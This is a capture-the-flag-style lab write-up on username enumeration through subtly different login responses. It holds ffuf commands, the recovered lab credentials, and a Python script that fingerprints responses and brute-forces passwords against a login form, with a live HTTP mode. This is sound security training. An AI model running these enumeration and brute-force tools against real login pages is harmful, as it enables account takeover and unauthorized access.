Lab: Username enumeration via subtly different responses



The login form returns the same error for both an incorrect username and an incorrect password, so the difference has to be picked out of the response size or word count rather than the message text.



Running ffuf over the username and password lists in clusterbomb mode and filtering out the two common word counts (2136 and 2127) leaves only results for the username al, whose response differs from the rest, so that is the username to use:
ffuf -request req.txt -request-proto https -mode clusterbomb -w usernames.txt:FUZZUSER -w passwords.txt:FUZZPASS -fw 2136,2127

Next, fuzz only the password for username al with the password wordlist; the correct password answers with a redirect instead of the error page:
ffuf -w passwords.txt:FUZZ -u https://0abf00b50407080a830c0211000700b6.web-security-academy.net/login -X POST -d 'username=al&password=FUZZ' -H "Content-Type: application/x-www-form-urlencoded"

Credentials found: al:15953

Solving it with Burp


Send the username list with a fixed wrong password and compare the error responses: user al doesn't have one, so its response is subtly different from the rest.

Now brute-force the password for al the same way; the correct password returns a different status code (the redirect) instead of the error page.
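The two stages above (pick out the username whose error response differs by a few bytes, then find the password whose response changes status) can be scripted directly. The block below is an added example, not code from the lab notes; the login URL, form parameter names and wordlists are assumptions, and the offline simulation (`fake_login`) is constructed to mimic the lab's behaviour, with the subtle difference chosen here as a missing trailing full stop in the error for a valid username.

```python
"""Username enumeration via subtly different responses, then password brute force.

Added example; not code from the original lab notes. The login URL, parameter
names and wordlists are assumptions, and the offline simulation below is
constructed to mimic the lab: the same error for a bad username and a bad
password, one valid username whose error body differs subtly, and a redirect
on a correct login.
"""
from collections import Counter
from typing import Callable, Iterable, List, Optional, Tuple
import urllib.error
import urllib.parse
import urllib.request

Response = Tuple[int, str]          # (HTTP status, response body)
Sender = Callable[[str, str], Response]


def fingerprint(status: int, body: str) -> Tuple[int, int, int]:
    """The same three metrics ffuf prints: status, byte size and word count.
    A valid username often shifts only one of them by a character or two."""
    return (status, len(body.encode()), len(body.split()))


def make_http_sender(url: str) -> Sender:
    """Real transport for a login form like the lab's (URL is an assumption).
    Redirects are not followed: a 302 on success is the signal we want to keep."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # urllib then raises HTTPError for 3xx instead of following

    opener = urllib.request.build_opener(NoRedirect)

    def send(username: str, password: str) -> Response:
        data = urllib.parse.urlencode({"username": username, "password": password}).encode()
        req = urllib.request.Request(
            url, data=data, method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with opener.open(req) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # 3xx/4xx/5xx still carry a body
            return err.code, err.read().decode(errors="replace")

    return send


def enumerate_usernames(send: Sender, usernames: Iterable[str],
                        probe_password: str = "invalid") -> List[str]:
    """What the clusterbomb run with -fw does by hand: send every username with
    a junk password, fingerprint each response and keep the usernames whose
    fingerprint is not the most common one (the shared "wrong user" error)."""
    fps = {u: fingerprint(*send(u, probe_password)) for u in usernames}
    if not fps:
        return []
    baseline = Counter(fps.values()).most_common(1)[0][0]
    return [u for u, fp in fps.items() if fp != baseline]


def brute_force_password(send: Sender, username: str, passwords: Iterable[str],
                         error_status: int = 200) -> Optional[Tuple[str, int]]:
    """Second stage: the first password whose status differs from the error
    page's status is the hit (the lab answers a correct login with a redirect)."""
    for pw in passwords:
        status, _ = send(username, pw)
        if status != error_status:
            return pw, status
    return None


# --- constructed offline simulation of the lab (assumption, not the real site) ---
_VALID_CREDS = {"al": "15953"}
_ERROR = "<p class=is-warning>Invalid username or password.</p>"
# The subtle difference is constructed here as a missing trailing full stop.
_ERROR_VALID_USER = "<p class=is-warning>Invalid username or password</p>"


def fake_login(username: str, password: str) -> Response:
    if _VALID_CREDS.get(username) == password:
        return 302, ""                      # success: redirect to the account page
    if username in _VALID_CREDS:
        return 200, _ERROR_VALID_USER       # valid user, wrong password
    return 200, _ERROR                      # unknown user


def demo(send: Sender = fake_login):
    users = ["admin", "root", "carlos", "al", "guest", "test"]   # constructed wordlist
    passwords = ["123456", "password", "15953", "qwerty"]        # constructed wordlist
    candidates = enumerate_usernames(send, users)
    hits = [(u, brute_force_password(send, u, passwords)) for u in candidates]
    return candidates, hits


if __name__ == "__main__":
    # For a live run swap in make_http_sender("https://<lab-id>.web-security-academy.net/login")
    print(demo())
```

The enumeration step deliberately compares the whole fingerprint rather than a fixed word count, so it also catches a valid username whose only tell is a one-byte size change (as with the constructed full stop), which a word-count filter alone would miss.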